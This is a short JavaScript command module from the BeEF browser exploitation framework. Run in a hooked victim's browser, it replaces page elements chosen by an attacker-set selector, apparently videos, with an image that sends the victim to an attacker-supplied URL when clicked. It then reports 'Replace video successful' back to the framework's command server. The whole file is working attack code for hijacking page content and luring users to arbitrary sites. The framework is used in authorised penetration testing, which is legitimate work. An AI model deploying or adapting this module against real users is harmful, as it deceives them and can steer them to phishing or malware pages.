//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
	$j('<%= @jquery_selector %>').each(function(){
		var width = $j(this).css('width');
		var height = $j(this).css('height');
		$j(this).replaceWith('<img src="data:image/png;base64,[encoded data, 15080 characters]" onclick="window.location=\'<%== @url %>\';" />');
	});
	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Replace video successful");
});
